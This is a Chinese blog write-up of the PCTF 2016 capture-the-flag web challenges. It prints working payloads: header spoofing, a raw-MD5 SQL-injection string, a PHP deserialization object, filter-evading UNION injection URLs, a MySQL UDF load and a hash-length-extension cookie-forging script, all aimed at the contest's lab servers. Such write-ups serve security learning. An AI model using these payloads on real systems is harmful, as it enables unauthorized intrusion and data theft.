PCTF 2016 writeup WEB部分

PCTF 2016 算是一次训练赛,题目较多,很多是原题,时间长,是一次很好的提升姿势的比赛。然而我姿势太低以至于只能在赛后看看别人的题解自己摸索。。。

0x01 PORT 51 WEB 100

题目链接

这题本来不难,然而我在校内网,端口一过路由就变了,导致一直没做出来,后来看到别人说拔路由我才反应过来应该上VPS做的。。。

sudo curl --local-port 51 web.phrack.top:32772

拿到flag

Yeah!! Here's your flag:PCTF{M45t3r_oF_CuRl}

0x02 LOCALHOST WEB 150

题目链接

抓包,加上一个xff头即可绕过限制。

X-Forwarded-For: 127.0.0.1

拿到flag

Yeah!! Here's your flag:PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}

0x03 Login WEB 250

题目链接

在headers里看到这么一句

Hint:"select * from `admin` where password='".md5($pass,true)."'"

google一下,找到参考链接。

直接用原文里的payload:

content: 129581926211651571912466741651878684928count:   18933549hex:     06da5430449f8f6f23dfc1276f722738raw:     ?T0D??o# ??'or'8.N=?

拿到flag

Correct pass!! Your Flag: PCTF{R4w_md5_is_d4ng3rous}

0x04 神盾局的秘密 WEB 300

题目链接

打开页面,就一张图片,看看源代码:

base64解开是shield.jpg。
打开图片链接,出现图片的乱码,应该是文件读取了。

showimg.php: http://web.phrack.top:32779/showimg.php?img=c2hvd2ltZy5waHA=

index.php: http://web.phrack.top:32779/showimg.php?img=aW5kZXgucGhw

readfile();?>

shield.php: http://web.phrack.top:32779/showimg.php?img=c2hpZWxkLnBocA==

 file = $filename;        }        function readfile() {            if (!empty($this->file) && stripos($this->file,'..')===FALSE              && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {                return @file_get_contents($this->file);            }        }    }?>

可以看出,flag在flag.php中,但需要绕过stripos。参数不从img传,应该从class传,这时class经过了反序列化,于是在本地随便搭建个环境。

index.php

readfile();?>

shield.php

 file = $filename;        }        function readfile() {            if (!empty($this->file) && stripos($this->file,'..')===FALSE              && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {                return @file_get_contents($this->file);            }        }    }?>

这样直接输出payload:

O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}

burp构造请求:

GET /index.php?class=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";} HTTP/1.1Host: web.phrack.top:32779Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36DNT: 1Referer: http://web.phrack.top:32779/Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en-GB;q=0.6,en;q=0.4Connection: close

拿到flag

0x05 In A Mess WEB 500

题目链接

index.phps可以看到源码。

";if(!$_GET['id']){    header('Location: index.php?id=1');    exit();}$id=$_GET['id'];$a=$_GET['a'];$b=$_GET['b'];if(stripos($a,'.')){    echo 'Hahahahahaha';    return ;}$data = @file_get_contents($a,'r');if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4){    require("flag.txt");}else{    print "work harder!harder!harder!";}?>

id绕过==0,随便试试就好了;data绕过stripos,用伪协议;b绕过eregi,用00截断,构造请求。

POST /index.php?id=.&a=php://input&b=%0012345 HTTP/1.1Host: web.phrack.top:32783Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36DNT: 1Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en-GB;q=0.6,en;q=0.4Connection: closeContent-Length: 191112 is a nice lab!

拿到下一关的提示

Come ON!!! {/^HT2mCpcvOLf}

访问http://web.phrack.top:32783/%5eHT2mCpcvOLf/index.php?id=1,得到一个注入点。测试可以看到过滤了一些关键词和空格,双写加注释绕过,构造payload。

//得到显示位3http://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,3# //数据库testhttp://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,database()# //表名contenthttp://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,group_concat(table_name)/*123*/frfromom/*111*/information_schema.tables/*111*/where/*111*/table_schema=0x74657374# //列名id, context, contenthttp://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,group_concat(column_name)/*123*/frfromom/*111*/information_schema.columns/*111*/where/*111*/table_name=0x636F6E74656E74# //拿到flag    1:PCTF{Fin4lly_U_got_i7_C0ngRatulation5}:hi666http://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,group_concat(id,0x3a,context,0x3a,title,0x3a)/*123*/frfromom/*111*/content# 

0x06 RE? WEB 300

题目链接

这一题完全不会,看到参考链接,结合udf.so,猜测是换成了Linux下的MySQL函数加载。

show variables like "%plugin%";+---------------+------------------------+| Variable_name | Value                  |+---------------+------------------------+| plugin_dir    | /usr/lib/mysql/plugin/ |+---------------+------------------------+

将udf.so复制到/usr/lib/mysql/plugin/下,ida打开可以看到里面有个getflag函数

create function getflag returns string soname "udf.so";select getflag();+------------------------------------------+| getflag()                                |+------------------------------------------+| PCTF{Interesting_U5er_d3fined_Function} |+------------------------------------------+

0x07 flag在管理员手里 WEB 350

题目链接

随手尝试http://web.phrack.top:32785/index.phps 下载到备份文件,结果打开全是乱码,重命名为.index.php.swp,用vim恢复。

vim -r index.php

得到源码。

Web 350    body {        background:gray;        text-align:center;    }

关键点应该在md5($salt.strrev($_COOKIE["role"])),Google一下,看到参考链接1和参考链接2。

于是可以改改人家的脚本。

# -*- coding:utf-8 -*-from urlparse import urlparsefrom httplib import HTTPConnectionfrom urllib import urlencodeimport jsonimport timeimport osimport urllibdef gao(x, y):        # print x        # print y    url = "http://web.phrack.top:32785/index.php"    cookie = "role=" + x + "; hsh=" + y        # print cookie    build_header = {            'Cookie': cookie,            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0',            'Host': 'web.phrack.top:32785',            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',    }    urlparts = urlparse(url)    conn = HTTPConnection(urlparts.hostname, urlparts.port or 80)    conn.request("GET", urlparts.path, '', build_header)    resp = conn.getresponse()    body = resp.read()    return bodyfor i in xrange(1000):    print i    # secret len = ???    find_hash = "./hash_extender -d ';\"tseug\":5:s' -s 3a4727d57463f122833d9e732f94e4e0 -f md5  -a ';\"nimda\":5:s' --out-data-format=html -l " + str(i) + " --quiet"    # print find_hash    calc_res = os.popen(find_hash).readlines()    hash_value = calc_res[0][:32]    attack_padding = calc_res[0][32:]    attack_padding = urllib.quote(urllib.unquote(attack_padding)[::-1])    ret = gao(attack_padding, hash_value)    if "Welcome" in ret:        print ret        break

拿到flag。

Web 350    body {        background:gray;        text-align:center;    }    ### Welcome Admin. Your flag is PCTF{H45h_ext3ndeR_i5_easy_to_us3} 

关键字:hacker, ctf

版权声明

本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处。如若内容有涉嫌抄袭侵权/违法违规/事实不符,请点击 举报 进行投诉反馈!

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部